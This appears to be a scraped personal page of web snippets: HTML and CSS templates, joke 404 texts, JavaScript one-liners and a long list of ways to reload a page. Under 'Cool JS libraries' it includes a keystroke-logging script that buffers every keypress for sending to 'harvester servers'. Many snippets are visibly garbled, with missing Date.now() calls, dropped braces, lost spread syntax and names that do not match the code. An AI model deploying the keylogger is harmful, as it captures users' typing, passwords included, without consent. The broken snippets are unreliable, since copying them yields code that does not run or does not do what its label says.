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Status Codes

Example Text and Pictures


Encypt Static Page

How to encypt a static page with staticrypt

npx staticrypt index.html password


  ##  ##  ######  ##   ##  ##
  ##  ##    ##    ### ###  ##
  ######    ##    ## # ##  ##
  ##  ##    ##    ##   ##  ##
  ##  ##    ##    ##   ##  ######
(((((((                     //(((((
 ((((((                     //((((
 ((((((    ((((((/////////////((((
 ((((((     (((((/////////////((((
 ((((((                    ///((((
  (((((                    ///(((
  (((((((((((((((//////    ///(((
  ((((((    (((((/////     ///(((
  ((((((                   ///(((
   (((((((               /////((

Show Base64 Images

<img src="data:image/png;base64,<Base64codehere>"/>
<!doctype html>
  function tricked() {
  <a href="" onclick="tricked()" id="naughty"></a>

Empty HTML File Template

<!doctype html>
<html lang="en">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="description" content="">
    <title>Minimal base.html</title>


Data list

<label for="input">Search for a word:</label>
<input list="datalist" id="input" name="example" />
<datalist id="datalist">
  <option value="type">
  <option value="random">
  <option value="words">
  <option value="in">
  <option value="the">
  <option value="input">

Example 404s

Great examples from other pages.

Financial Times

Financial Times 404 Error page:

Why wasn't this page found?

We asked some leading economists.

  • Stagflation: The cost of pages rose drastically, while the page production rate slowed down.
  • General economics: There was no market for it.
  • Liquidity traps: We injected some extra money into the technology team but there was little or no interest so they simply kept it, thus failing to stimulate the page economy.
  • Pareto inefficiency: There exists another page that will make everyone better off without making anyone worse off.
  • Supply and demand: Demand increased and a shortage occurred.
  • Classical economics: There is no such page. We are not going to interfere.
  • Keynesian economics: Aggregate demand for this page did not necessarily equal the productive capacity of the website.
  • Malthusianism: Unchecked, exponential page growth outstripped the pixel supply. There was a catastrophe, and now the population is at a lower, more sustainable level.
  • Neo-Malthusianism: To avoid unchecked, exponential page growth outstripping the pixel supply and leading to an inevitable catastrophe, we prevented this page from being conceived.
  • Marxism: The failure of this page to load is a consequence of the inherent contradictions in the capitalist mode of production.
  • Laissez Faire Capitalism: We know this page is needed, but we can't force anyone to make it.
  • Monetarism: The government has limited the number of pages in circulation.
  • Efficient Markets Hypothesis: If you had paid enough for the page, it would have appeared.
  • Moral Hazard: Showing you this page would only encourage you to want more pages.
  • Tragedy of the Commons: Everyone wanted to view this page, but no-one was willing to maintain it.
  • Game theory: By not viewing this page you help everyone else get better pages.
  • Mercantilism: The page is hosted by a foreign web server and is therefore banned to ensure the supremacy of our own software.
  • Trickle-down: High taxes on content publishers prevented them hiring the person who would have written this page.
  • Speculative bubble: The page never actually existed and was fundamentally impossible, but everyone bought into it in a frenzy and it's all now ending in tears.
  • Socialism: If you were to get the page you wanted you might get a better page than someone else, which would be unfair. This way at least everyone gets the same.
  • Behavioural economics: The influence of psychological factors caused you to act in a manner that would not be expected of a purely rational actor.
  • Theory of the second best: The best outcome was unachievable, so you have arrived here instead.


        ####    ####    ####
       ##  ##  ##      ##
       ##       ####    ####
       ##  ##      ##      ##
        ####    ####    ####
(((((((                    ///(((((
 ((((((                    ///((((
 ((((((((((((((((        /////((((
 (((((((((((        //////////((((
 (((((((                   ///((((
  ((((((                   ///(((
  (((((((((((((((//////    ///(((
  (((((((    ((((//////    ///(((
  (((((((                  ///(((
   (((((((               /////((

Lern CSS

CSS Tools

CSS Templates

Lists of others

CSS Examples

CSS reset template (source). What it does:

  • Use a more-intuitive box-sizing model
  • Remove default margin
  • Allow percentage-based heights in the application
  • Add accessible line-height
  • Improve text rendering
  • Improve media defaults
  • Remove built-in form typography styles
  • Avoid text overflows
  • Create a root stacking context


*, *::before, *::after {
  box-sizing: border-box;

* {
  margin: 0;

html, body {
  height: 100%;

body {
  line-height: 1.5;
  -webkit-font-smoothing: antialiased;

img, picture, video, canvas, svg {
  display: block;
  max-width: 100%;

input, button, textarea, select {
  font: inherit;

p, h1, h2, h3, h4, h5, h6 {
  overflow-wrap: break-word;

#root, #__next {
  isolation: isolate;

ASCII Boarder

<div class="broider"><br/></div>
.broider {
    border-image:  url("") 28 /  28px / 0 round;
    border-width:  28px;
    border-style:  solid;



Cool JS libraries


(() => {
  let buffer = []
  let limit  = 1024
  let start  =

  let timeout = null
  let delay   = 1500

  let feast = (payload) => {
    // Replace this with a POST to your harvester servers.

  let harvest = () => {
    let end     =
    let payload = {c: buffer, s: start, e: end}


    buffer = []
    start  =

  document.addEventListener('keydown', (event) => {
    let key   = event.key || event.keyCode;
    let entry = {k: key, t:}

    if (buffer.length >= limit) { harvest() }

    timeout = setTimeout(() => { harvest() }, delay);


Set viewport based on mobile or desktop

var viewMode = getCookie("view-mode");
if(viewMode == "desktop"){
    viewport.setAttribute('content', 'width=1024');
}else if (viewMode == "mobile"){
    viewport.setAttribute('content', 'width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=no');

Integer Stuff

Greatest common divisor (GCD)

Base case is when y equals 0. In this case, return x. Otherwise, return the GCD of y and the remainder of the division x/y.

var gcd = (x , y) => !y ? x : gcd(y, x % y);

Even or odd number

Use Math.abs() to extend logic to negative numbers, check using the modulo (%) operator. Return true if the number is even, false if the number is odd.

var isEven = num => Math.abs(num) % 2 === 0;

String manipulation

Sort characters in string (alphabetical)

Split the string using split(''), sort() utilizing localeCompare(), recombine using join('').

var sortCharactersInString = str =>
  str.split('').sort( (a,b) => a.localeCompare(b) ).join('');

Capitalize first letter

Use toUpperCase() to capitalize first letter, slice(1) to get the rest of the string.

var capitalize = str => str[0].toUpperCase() + str.slice(1);

Anagrams of string (with duplicates)

Use recursion. For each letter in the given string, create all the partial anagrams for the rest of its letters. Use map() to combine the letter with each partial anagram, then reduce() to combine all anagrams in one array. Base cases are for string length equal to 2 or 1.

var anagrams = s => {
  if(s.length <= 2)  return s.length === 2 ? [s, s[1] + s[0]] : [s];
  return s.split('').reduce( (a,l,i) => {
    anagrams(s.slice(0,i) + s.slice(i+1)).map( v => a.push(l+v) );
    return a;
  }, []);

Escape regular expression

Use replace() to escape special characters.

var escapeRegExp = s =>
  s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');


Filter out non-unique values in an array

Use Array.filter() for an array containing only the unique values.

const unique = arr => arr.filter(i => arr.indexOf(i) === arr.lastIndexOf(i));
// unique([1,2,2,3,4,4,5]) → [1,3,5]

Flatten array

Use reduce() to get all elements that are not arrays, flatten each element that is an array.

var flatten = arr =>
  arr.reduce( (a, v) => a.concat( Array.isArray(v) ? flatten(v) : v ), []);

Average of array of numbers

Use reduce() to add each value to an accumulator, initialized with a value of 0, divide by the length of the array.

var average = arr =>
  arr.reduce( (acc , val) => acc + val, 0) / arr.length;

Count occurrences of a value in array

Use filter() to create an array containing only the items with the specified value, count them using length.

var countOccurrences = (arr, value) => arr.filter(v => v === value).length;

Difference between arrays

Use filter() to remove values that are part of values, determined using indexOf().

var difference = (arr, values) =>
  arr.filter(v => values.indexOf(v) === -1);

Return last of list

Return arr.slice(-1)[0].

var initial = arr => arr.slice(-1)[0];

Return first of list

Return arr.slice(0,-1).

var initial = arr => arr.slice(0,-1);

Similarity between arrays

Use filter() to remove values that are not part of values, determined using indexOf().

var difference = (arr, values) =>
  arr.filter(v => values.indexOf(v) !== -1);


Use reduce() combined with map() to iterate over elements and combine into an array containing all combinations.

var powerset = arr =>
  arr.reduce( (a,v) => a.concat( r => [v].concat(r) )), [[]]);

Unique values of array

Use ES6 Set and the operator to discard all duplicated values.

const unique = arr => [ Set(arr)];
// unique([1,2,2,3,4,4,5]) → [1,2,3,4,5]

Sum of array of numbers

Use reduce() to add each value to an accumulator, initialized with a value of 0.

var sum = arr =>
  arr.reduce( (acc , val) => acc + val, 0);


Create an array of length n+1, use reduce() to get the product of every value in the given range, utilizing the index of each element.

var factorial = n =>
  Array.apply(null, [1].concat(Array(n))).reduce( (a, _, i) => a * i || 1 , 1);



If the number of provided arguments (args) is sufficient, call the passed function f. Otherwise return a curried function f that expects the rest of the arguments.

var curry = f =>
  (...args) =>
    args.length >= f.length ? f(...args) : (...otherArgs) => curry(f)(...args, ...otherArgs)


Measure time taken by function

Use to get start and end time for the function, console.log() the time taken. First argument is the function name, subsequent arguments are passed to the function.

var timeTaken = (f,...args) => {
  var t0 =, r = f(...args);
  console.log( - t0);
  return r;


RGB to hexadecimal

Convert each value to a hexadecimal string, using toString(16), then padStart(2,'0') to get a 2-digit hexadecimal value. Combine values using join('').

var rgbToHex = (r, g, b) =>
  [r,g,b].map( v => v.toString(16).padStart(2,'0')).join('');


Randomize order of array

Use sort() to reorder elements, utilizing Math.random() to randomize the sorting.

var randomizeOrder = arr => arr.sort( (a,b) => Math.random() >= 0.5 ? -1 : 1)

Random number in range

Use Math.random() to generate a random value, map it to the desired range using multiplication.

var randomInRange = (min, max) => Math.random() * (max - min) + min;

UUID generator

Use crypto API to generate a UUID, compliant with RFC4122 version 4.

var uuid = _ =>
  ( [1e7]+-1e3+-4e3+-8e3+-1e11 ).replace( /[018]/g, c =>
    (c ^ crypto.getRandomValues(new Uint8Array(1))[0] & 15 >> c / 4).toString(16)

Manipulate Web Page

URL parameters

Use match() with an appropriate regular expression to get all key-value pairs, map() them appropriately. Combine all key-value pairs into a single object using Object.assign() and the spread operator (...). Pass as the argument to apply to the current url.

var getUrlParameters = url =>
  Object.assign(...url.match(/([^?=&]+)(=([^&]*))?/g).map(m => {[f,v] = m.split('='); return {[f]:v}}));

Scroll to top

Get distance from top using document.documentElement.scrollTop or document.body.scrollTop. Scroll by a fraction of the distance from top. Use window.requestFrame() to animate the scrolling.

var scrollToTop = _ => {
  var c = document.documentElement.scrollTop || document.body.scrollTop;
  if(c > 0) {
    window.scrollTo(0, c - c/8);

Random unsorted

prefix an integer with zeros

function PrefixInteger(num, length) {

return (Array(length).join('0') + num).slice(-length);

String converter

function CreateTranslator(translationTable) function(s) s.replace(new RegExp([k for (k in translationTable)].join('|'), 'g'), function(str) translationTable[str]);

var translationTable = { a:1, bb:2, b:3, c:4 };
var MyTranslater = CreateTranslator( translationTable );
MyTranslater('aabbbc'); // returns: 11234

Brainfuck interpreter

var code = '++++++++++[>+++++++>++++++++++>+++>+<<<<-]>++.>+.+++++++..+++.>++.&lt;&lt;+++++++++++++++.>.+++.------.--------.>+.>.';
var inp = '23\\n';
var out = '';

var codeSize = code.length;
var i = 0, ip = 0, cp = 0, dp = 0, m = {};

var loopIn = {}, loopOut = {};
var tmp = \[];
for ( var cp = 0; cp &lt; codeSize ; cp++ )
if ( code[cp] == '\[' )
if ( code[cp] == ']' )
            loopOut\[loopIn[cp] = tmp.pop()] = cp;

for (var cp = 0; cp &lt; codeSize && i &lt; 100000; cp++, i++) {

switch(code[cp]) {

case '>': dp++; break;
case '&lt;': dp--; break;
case '+': m[dp] = ((m[dp]||0)+1)&255; break
case '-': m[dp] = ((m[dp]||0)-1)&255; break;
case '.': out += String.fromCharCode(m[dp]); break;
case ',': m[dp] = inp.charCodeAt(ip++)||0; break;
case '\[': m[dp]||(cp=loopOut[cp]); break;
case ']': cp = loopIn[cp]-1; break;

Add page to favorites

function pageToolsBookmark() {
  bkmkurl= document.URL;
  bkmktitle= document.title;
  if (document.all) {
  } else {
    alert("Please use Control + D to set a bookmark for this page");

Escape and unescape HTML entities

const entityToCode = { **proto**: null,

var charToEntity = {};
for ( var entityName in entityToCode )
        charToEntity\[String.fromCharCode(entityToCode[entityName])] = entityName;

function UnescapeEntities(str) str.replace(/&(.+?);/g, function(str, ent) String.fromCharCode( ent[0]!='#' ? entityToCode[ent] &#x3A; ent[1]=='x' ? parseInt(ent.substr(2),16): parseInt(ent.substr(1)) ) );

function EscapeEntities(str) str.replace(/[^\x20-\x7E]/g, function(str) charToEntity[str] ? '&'+charToEntity[str]+';' : str );

534 ways to reload the page with JavaScript

- location = location
- location = location.href
- location = window.location
- location = self.location
- location = window.location.href
- location = self.location.href
- location = location['href']
- location = window['location']
- location = window['location'].href
- location = window['location']['href']
- location = window.location['href']
- location = self['location']
- location = self['location'].href
- location = self['location']['href']
- location = self.location['href']
- location.assign(location)
- location.replace(location)
- window.location.assign(location)
- window.location.replace(location)
- self.location.assign(location)
- self.location.replace(location)
- location['assign'](location)
- location['replace'](location)
- window.location['assign'](location)
- window.location['replace'](location)
- window['location'].assign(location)
- window['location'].replace(location)
- window['location']['assign'](location)
- window['location']['replace'](location)
- self.location['assign'](location)
- self.location['replace'](location)
- self['location'].assign(location)
- self['location'].replace(location)
- self['location']['assign'](location)
- self['location']['replace'](location)
- location.href = location
- location.href = location.href
- location.href = window.location
- location.href = self.location
- location.href = window.location.href
- location.href = self.location.href
- location.href = location['href']
- location.href = window['location']
- location.href = window['location'].href
- location.href = window['location']['href']
- location.href = window.location['href']
- location.href = self['location']
- location.href = self['location'].href
- location.href = self['location']['href']
- location.href = self.location['href']
- location.assign(location.href)
- location.replace(location.href)
- window.location.assign(location.href)
- window.location.replace(location.href)
- self.location.assign(location.href)
- self.location.replace(location.href)
- location['assign'](location.href)
- location['replace'](location.href)
- window.location['assign'](location.href)
- window.location['replace'](location.href)
- window['location'].assign(location.href)
- window['location'].replace(location.href)
- window['location']['assign'](location.href)
- window['location']['replace'](location.href)
- self.location['assign'](location.href)
- self.location['replace'](location.href)
- self['location'].assign(location.href)
- self['location'].replace(location.href)
- self['location']['assign'](location.href)
- self['location']['replace'](location.href)
- window.location = location
- window.location = location.href
- window.location = window.location
- window.location = self.location
- window.location = window.location.href
- window.location = self.location.href
- window.location = location['href']
- window.location = window['location']
- window.location = window['location'].href
- window.location = window['location']['href']
- window.location = window.location['href']
- window.location = self['location']
- window.location = self['location'].href
- window.location = self['location']['href']
- window.location = self.location['href']
- location.assign(window.location)
- location.replace(window.location)
- window.location.assign(window.location)
- window.location.replace(window.location)
- self.location.assign(window.location)
- self.location.replace(window.location)
- location['assign'](window.location)
- location['replace'](window.location)
- window.location['assign'](window.location)
- window.location['replace'](window.location)
- window['location'].assign(window.location)
- window['location'].replace(window.location)
- window['location']['assign'](window.location)
- window['location']['replace'](window.location)
- self.location['assign'](window.location)
- self.location['replace'](window.location)
- self['location'].assign(window.location)
- self['location'].replace(window.location)
- self['location']['assign'](window.location)
- self['location']['replace'](window.location)
- self.location = location
- self.location = location.href
- self.location = window.location
- self.location = self.location
- self.location = window.location.href
- self.location = self.location.href
- self.location = location['href']
- self.location = window['location']
- self.location = window['location'].href
- self.location = window['location']['href']
- self.location = window.location['href']
- self.location = self['location']
- self.location = self['location'].href
- self.location = self['location']['href']
- self.location = self.location['href']
- location.assign(self.location)
- location.replace(self.location)
- window.location.assign(self.location)
- window.location.replace(self.location)
- self.location.assign(self.location)
- self.location.replace(self.location)
- location['assign'](self.location)
- location['replace'](self.location)
- window.location['assign'](self.location)
- window.location['replace'](self.location)
- window['location'].assign(self.location)
- window['location'].replace(self.location)
- window['location']['assign'](self.location)
- window['location']['replace'](self.location)
- self.location['assign'](self.location)
- self.location['replace'](self.location)
- self['location'].assign(self.location)
- self['location'].replace(self.location)
- self['location']['assign'](self.location)
- self['location']['replace'](self.location)
- window.location.href = location
- window.location.href = location.href
- window.location.href = window.location
- window.location.href = self.location
- window.location.href = window.location.href
- window.location.href = self.location.href
- window.location.href = location['href']
- window.location.href = window['location']
- window.location.href = window['location'].href
- window.location.href = window['location']['href']
- window.location.href = window.location['href']
- window.location.href = self['location']
- window.location.href = self['location'].href
- window.location.href = self['location']['href']
- window.location.href = self.location['href']
- location.assign(window.location.href)
- location.replace(window.location.href)
- window.location.assign(window.location.href)
- window.location.replace(window.location.href)
- self.location.assign(window.location.href)
- self.location.replace(window.location.href)
- location['assign'](window.location.href)
- location['replace'](window.location.href)
- window.location['assign'](window.location.href)
- window.location['replace'](window.location.href)
- window['location'].assign(window.location.href)
- window['location'].replace(window.location.href)
- window['location']['assign'](window.location.href)
- window['location']['replace'](window.location.href)
- self.location['assign'](window.location.href)
- self.location['replace'](window.location.href)
- self['location'].assign(window.location.href)
- self['location'].replace(window.location.href)
- self['location']['assign'](window.location.href)
- self['location']['replace'](window.location.href)
- self.location.href = location
- self.location.href = location.href
- self.location.href = window.location
- self.location.href = self.location
- self.location.href = window.location.href
- self.location.href = self.location.href
- self.location.href = location['href']
- self.location.href = window['location']
- self.location.href = window['location'].href
- self.location.href = window['location']['href']
- self.location.href = window.location['href']
- self.location.href = self['location']
- self.location.href = self['location'].href
- self.location.href = self['location']['href']
- self.location.href = self.location['href']
- location.assign(self.location.href)
- location.replace(self.location.href)
- window.location.assign(self.location.href)
- window.location.replace(self.location.href)
- self.location.assign(self.location.href)
- self.location.replace(self.location.href)
- location['assign'](self.location.href)
- location['replace'](self.location.href)
- window.location['assign'](self.location.href)
- window.location['replace'](self.location.href)
- window['location'].assign(self.location.href)
- window['location'].replace(self.location.href)
- window['location']['assign'](self.location.href)
- window['location']['replace'](self.location.href)
- self.location['assign'](self.location.href)
- self.location['replace'](self.location.href)
- self['location'].assign(self.location.href)
- self['location'].replace(self.location.href)
- self['location']['assign'](self.location.href)
- self['location']['replace'](self.location.href)
- location['href'] = location
- location['href'] = location.href
- location['href'] = window.location
- location['href'] = self.location
- location['href'] = window.location.href
- location['href'] = self.location.href
- location['href'] = location['href']
- location['href'] = window['location']
- location['href'] = window['location'].href
- location['href'] = window['location']['href']
- location['href'] = window.location['href']
- location['href'] = self['location']
- location['href'] = self['location'].href
- location['href'] = self['location']['href']
- location['href'] = self.location['href']
- location.assign(location['href'])
- location.replace(location['href'])
- window.location.assign(location['href'])
- window.location.replace(location['href'])
- self.location.assign(location['href'])
- self.location.replace(location['href'])
- location['assign'](location['href'])
- location['replace'](location['href'])
- window.location['assign'](location['href'])
- window.location['replace'](location['href'])
- window['location'].assign(location['href'])
- window['location'].replace(location['href'])
- window['location']['assign'](location['href'])
- window['location']['replace'](location['href'])
- self.location['assign'](location['href'])
- self.location['replace'](location['href'])
- self['location'].assign(location['href'])
- self['location'].replace(location['href'])
- self['location']['assign'](location['href'])
- self['location']['replace'](location['href'])
- window['location'] = location
- window['location'] = location.href
- window['location'] = window.location
- window['location'] = self.location
- window['location'] = window.location.href
- window['location'] = self.location.href
- window['location'] = location['href']
- window['location'] = window['location']
- window['location'] = window['location'].href
- window['location'] = window['location']['href']
- window['location'] = window.location['href']
- window['location'] = self['location']
- window['location'] = self['location'].href
- window['location'] = self['location']['href']
- window['location'] = self.location['href']
- location.assign(window['location'])
- location.replace(window['location'])
- window.location.assign(window['location'])
- window.location.replace(window['location'])
- self.location.assign(window['location'])
- self.location.replace(window['location'])
- location['assign'](window['location'])
- location['replace'](window['location'])
- window.location['assign'](window['location'])
- window.location['replace'](window['location'])
- window['location'].assign(window['location'])
- window['location'].replace(window['location'])
- window['location']['assign'](window['location'])
- window['location']['replace'](window['location'])
- self.location['assign'](window['location'])
- self.location['replace'](window['location'])
- self['location'].assign(window['location'])
- self['location'].replace(window['location'])
- self['location']['assign'](window['location'])
- self['location']['replace'](window['location'])
- window['location'].href = location
- window['location'].href = location.href
- window['location'].href = window.location
- window['location'].href = self.location
- window['location'].href = window.location.href
- window['location'].href = self.location.href
- window['location'].href = location['href']
- window['location'].href = window['location']
- window['location'].href = window['location'].href
- window['location'].href = window['location']['href']
- window['location'].href = window.location['href']
- window['location'].href = self['location']
- window['location'].href = self['location'].href
- window['location'].href = self['location']['href']
- window['location'].href = self.location['href']
- location.assign(window['location'].href)
- location.replace(window['location'].href)
- window.location.assign(window['location'].href)
- window.location.replace(window['location'].href)
- self.location.assign(window['location'].href)
- self.location.replace(window['location'].href)
- location['assign'](window['location'].href)
- location['replace'](window['location'].href)
- window.location['assign'](window['location'].href)
- window.location['replace'](window['location'].href)
- window['location'].assign(window['location'].href)
- window['location'].replace(window['location'].href)
- window['location']['assign'](window['location'].href)
- window['location']['replace'](window['location'].href)
- self.location['assign'](window['location'].href)
- self.location['replace'](window['location'].href)
- self['location'].assign(window['location'].href)
- self['location'].replace(window['location'].href)
- self['location']['assign'](window['location'].href)
- self['location']['replace'](window['location'].href)
- window['location']['href'] = location
- window['location']['href'] = location.href
- window['location']['href'] = window.location
- window['location']['href'] = self.location
- window['location']['href'] = window.location.href
- window['location']['href'] = self.location.href
- window['location']['href'] = location['href']
- window['location']['href'] = window['location']
- window['location']['href'] = window['location'].href
- window['location']['href'] = window['location']['href']
- window['location']['href'] = window.location['href']
- window['location']['href'] = self['location']
- window['location']['href'] = self['location'].href
- window['location']['href'] = self['location']['href']
- window['location']['href'] = self.location['href']
- location.assign(window['location']['href'])
- location.replace(window['location']['href'])
- window.location.assign(window['location']['href'])
- window.location.replace(window['location']['href'])
- self.location.assign(window['location']['href'])
- self.location.replace(window['location']['href'])
- location['assign'](window['location']['href'])
- location['replace'](window['location']['href'])
- window.location['assign'](window['location']['href'])
- window.location['replace'](window['location']['href'])
- window['location'].assign(window['location']['href'])
- window['location'].replace(window['location']['href'])
- window['location']['assign'](window['location']['href'])
- window['location']['replace'](window['location']['href'])
- self.location['assign'](window['location']['href'])
- self.location['replace'](window['location']['href'])
- self['location'].assign(window['location']['href'])
- self['location'].replace(window['location']['href'])
- self['location']['assign'](window['location']['href'])
- self['location']['replace'](window['location']['href'])
- window.location['href'] = location
- window.location['href'] = location.href
- window.location['href'] = window.location
- window.location['href'] = self.location
- window.location['href'] = window.location.href
- window.location['href'] = self.location.href
- window.location['href'] = location['href']
- window.location['href'] = window['location']
- window.location['href'] = window['location'].href
- window.location['href'] = window['location']['href']
- window.location['href'] = window.location['href']
- window.location['href'] = self['location']
- window.location['href'] = self['location'].href
- window.location['href'] = self['location']['href']
- window.location['href'] = self.location['href']
- location.assign(window.location['href'])
- location.replace(window.location['href'])
- window.location.assign(window.location['href'])
- window.location.replace(window.location['href'])
- self.location.assign(window.location['href'])
- self.location.replace(window.location['href'])
- location['assign'](window.location['href'])
- location['replace'](window.location['href'])
- window.location['assign'](window.location['href'])
- window.location['replace'](window.location['href'])
- window['location'].assign(window.location['href'])
- window['location'].replace(window.location['href'])
- window['location']['assign'](window.location['href'])
- window['location']['replace'](window.location['href'])
- self.location['assign'](window.location['href'])
- self.location['replace'](window.location['href'])
- self['location'].assign(window.location['href'])
- self['location'].replace(window.location['href'])
- self['location']['assign'](window.location['href'])
- self['location']['replace'](window.location['href'])
- self['location'] = location
- self['location'] = location.href
- self['location'] = window.location
- self['location'] = self.location
- self['location'] = window.location.href
- self['location'] = self.location.href
- self['location'] = location['href']
- self['location'] = window['location']
- self['location'] = window['location'].href
- self['location'] = window['location']['href']
- self['location'] = window.location['href']
- self['location'] = self['location']
- self['location'] = self['location'].href
- self['location'] = self['location']['href']
- self['location'] = self.location['href']
- location.assign(self['location'])
- location.replace(self['location'])
- window.location.assign(self['location'])
- window.location.replace(self['location'])
- self.location.assign(self['location'])
- self.location.replace(self['location'])
- location['assign'](self['location'])
- location['replace'](self['location'])
- window.location['assign'](self['location'])
- window.location['replace'](self['location'])
- window['location'].assign(self['location'])
- window['location'].replace(self['location'])
- window['location']['assign'](self['location'])
- window['location']['replace'](self['location'])
- self.location['assign'](self['location'])
- self.location['replace'](self['location'])
- self['location'].assign(self['location'])
- self['location'].replace(self['location'])
- self['location']['assign'](self['location'])
- self['location']['replace'](self['location'])
- self['location'].href = location
- self['location'].href = location.href
- self['location'].href = window.location
- self['location'].href = self.location
- self['location'].href = window.location.href
- self['location'].href = self.location.href
- self['location'].href = location['href']
- self['location'].href = window['location']
- self['location'].href = window['location'].href
- self['location'].href = window['location']['href']
- self['location'].href = window.location['href']
- self['location'].href = self['location']
- self['location'].href = self['location'].href
- self['location'].href = self['location']['href']
- self['location'].href = self.location['href']
- location.assign(self['location'].href)
- location.replace(self['location'].href)
- window.location.assign(self['location'].href)
- window.location.replace(self['location'].href)
- self.location.assign(self['location'].href)
- self.location.replace(self['location'].href)
- location['assign'](self['location'].href)
- location['replace'](self['location'].href)
- window.location['assign'](self['location'].href)
- window.location['replace'](self['location'].href)
- window['location'].assign(self['location'].href)
- window['location'].replace(self['location'].href)
- window['location']['assign'](self['location'].href)
- window['location']['replace'](self['location'].href)
- self.location['assign'](self['location'].href)
- self.location['replace'](self['location'].href)
- self['location'].assign(self['location'].href)
- self['location'].replace(self['location'].href)
- self['location']['assign'](self['location'].href)
- self['location']['replace'](self['location'].href)
- self['location']['href'] = location
- self['location']['href'] = location.href
- self['location']['href'] = window.location
- self['location']['href'] = self.location
- self['location']['href'] = window.location.href
- self['location']['href'] = self.location.href
- self['location']['href'] = location['href']
- self['location']['href'] = window['location']
- self['location']['href'] = window['location'].href
- self['location']['href'] = window['location']['href']
- self['location']['href'] = window.location['href']
- self['location']['href'] = self['location']
- self['location']['href'] = self['location'].href
- self['location']['href'] = self['location']['href']
- self['location']['href'] = self.location['href']
- location.assign(self['location']['href'])
- location.replace(self['location']['href'])
- window.location.assign(self['location']['href'])
- window.location.replace(self['location']['href'])
- self.location.assign(self['location']['href'])
- self.location.replace(self['location']['href'])
- location['assign'](self['location']['href'])
- location['replace'](self['location']['href'])
- window.location['assign'](self['location']['href'])
- window.location['replace'](self['location']['href'])
- window['location'].assign(self['location']['href'])
- window['location'].replace(self['location']['href'])
- window['location']['assign'](self['location']['href'])
- window['location']['replace'](self['location']['href'])
- self.location['assign'](self['location']['href'])
- self.location['replace'](self['location']['href'])
- self['location'].assign(self['location']['href'])
- self['location'].replace(self['location']['href'])
- self['location']['assign'](self['location']['href'])
- self['location']['replace'](self['location']['href'])
- self.location['href'] = location
- self.location['href'] = location.href
- self.location['href'] = window.location
- self.location['href'] = self.location
- self.location['href'] = window.location.href
- self.location['href'] = self.location.href
- self.location['href'] = location['href']
- self.location['href'] = window['location']
- self.location['href'] = window['location'].href
- self.location['href'] = window['location']['href']
- self.location['href'] = window.location['href']
- self.location['href'] = self['location']
- self.location['href'] = self['location'].href
- self.location['href'] = self['location']['href']
- self.location['href'] = self.location['href']
- location.assign(self.location['href'])
- location.replace(self.location['href'])
- window.location.assign(self.location['href'])
- window.location.replace(self.location['href'])
- self.location.assign(self.location['href'])
- self.location.replace(self.location['href'])
- location['assign'](self.location['href'])
- location['replace'](self.location['href'])
- window.location['assign'](self.location['href'])
- window.location['replace'](self.location['href'])
- window['location'].assign(self.location['href'])
- window['location'].replace(self.location['href'])
- window['location']['assign'](self.location['href'])
- window['location']['replace'](self.location['href'])
- self.location['assign'](self.location['href'])
- self.location['replace'](self.location['href'])
- self['location'].assign(self.location['href'])
- self['location'].replace(self.location['href'])
- self['location']['assign'](self.location['href'])
- self['location']['replace'](self.location['href'])
- location.reload()
- location['reload'](<>)
- window.location.reload()
- window['location'].reload()
- window.location['reload'](<>)
- window['location']['reload']()
- self.location.reload()
- self['location'].reload()
- self.location['reload'](<>)
- self['location']['reload']()